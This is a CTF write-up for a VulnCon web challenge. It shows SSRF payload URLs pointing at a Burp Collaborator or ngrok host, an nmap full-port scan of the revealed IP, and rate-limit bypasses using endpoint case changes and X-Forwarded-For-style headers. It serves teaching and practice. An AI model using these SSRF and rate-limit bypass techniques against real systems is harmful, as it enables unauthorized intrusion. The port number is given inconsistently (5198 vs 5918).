R4t3 L1m1t 2 Challenge Writeup — CTF

Hello Folks, am back again another writeup on my channel which is actually based on SSRF , Network Scanning & RateLimit Bypassing.

Challenge Name — R4t3 L1m1t 2

Category — Web

Organizer — VulnCon

Author — th3pr0xyb0y

Challenge Description How It Exactly Looked Like

Description — ‘John is developing a website to show images to customer. Some customers tries to mess with his website and got the IP address of the server on which admin panel is hosted but they were stucked by rate limit implemented by John. Now your task is to find hidden admin dashboard and bypass rate limit to get your flag.’

Link — http://ratelimit2.noobarmy.org

Solution : So if we look at description we get to know there is something related to getting ip address and then bypassing ratelimit so let’s take a look on challenge page

Umm’s Images & Images when you will refresh the page again and again you will see random images except one image which is mine in this case (it can be any one image which will be static ) an player can also identify by viewing source code if you view clearly in source code one of the image is being fetched from /images/image.jpg let me add image snippet for clearer view

So here if We see at the alt tag we get a base64 encoded string given below d2VlYXR0aGVjb29raWVzaW5tb3JuaW5nZGlkeW91Pw=

Decoding the base64 using https://www.base64decode.org will give “weeatthecookiesinmorningdidyou?”

Umm interesting string so it is telling us something related to cookie let’s checkout cookies

There are so many cookies but if we dig deeper and look into the values all values resemble an endpoint /show?xxx=an_image_url so it looks like an vulnerable endpoint so an player needs to extract all the endpoints from cookies or photograph js file in source code and bruteforce them to find correct endpoint replace an_image_url with a burp collabrater or own server url to get the internal ip address behind cloud-fare actually doing an external ssrf the final and working payload you will get is

“http://ratelimit2.noobarmy.org/show?wwe=burpcollaburlhere/anything.jpg”

“http://ratelimit2.noobarmy.org/show?wwe=ngrokiphere/anything.jpg”

Decoding the base64 using https://www.base64decode.org will give “weeatthecookiesinmorningdidyou?”

Bonus Point — if you see decoded message it has wee connected from starting it also has cookies and it is way of guessing parameters without bruteforcing.

see image below for succesfully exploitation of external ssrf

Ip Found : 45.63.85.56

Once we got ip internal address then what can we do with internal IP address? you guessed it right we will run an full nmap scan over it

Command : nmap -p 1–65535 45.63.85.56

Port Found : 5198

ShoutOut To My BugHunting Course(Upto 70+ Hours) — Do Checkout E-CyberXplore https://edu.cyberxplore.com [Not Related to This CTF Just A ShoutOut]

Ohh wow we founded a new port 5198 le’t’s look on content of the this port let’s visit http://45.63.85.56:5918

On http://45.63.85.56:5918 We get the same old ratelimit page with some text change on frontend so how to proceed further ? so author planned this that this page will be an dead-end for all the people who haven’t solved the previous r4t3l1m1t challenge (writeup Click Here ) can’t go ahead easily because it is exactly same here as previous one the author just added that X-Something Header is necessary this time to get flag and players can’t even use ip rotation they needed to know the bypass this time.

so i hope you read r4t3l1m1t challenge (Click Here) and come back to this writeup again so now you understood ratelimits can be bypassed by changing endpoint case(uppercase+lowercase or uppercase only except lowercase)

so if we do what we did last time on one of the otp we get a wierd response

{“msg”:”Y00000u 4r3 S00000 Cl00000000$3"}

so after this author wants player to try the regular bypasses which X-Something

For example

X-Forwarded-For:

X-Host:

X-Remote-IP:

Etc

As soon as player will send the request with any of the X-Something Header , Brute-force & Checks Content instead of Content Length Like In Last Challenge he will get the flag see

Bonus Tip 2 — if you look at above request which shows you you are so close it signifies the OTP we entered is correct but there is something we are missing so no need to bruteforce as we can directly add header & get flag

Bonus Tip 3- if you are keen observer then the port on which service is running become OTP when reversed 5918 is the PORT & 8195 is the OTP

See In Action Below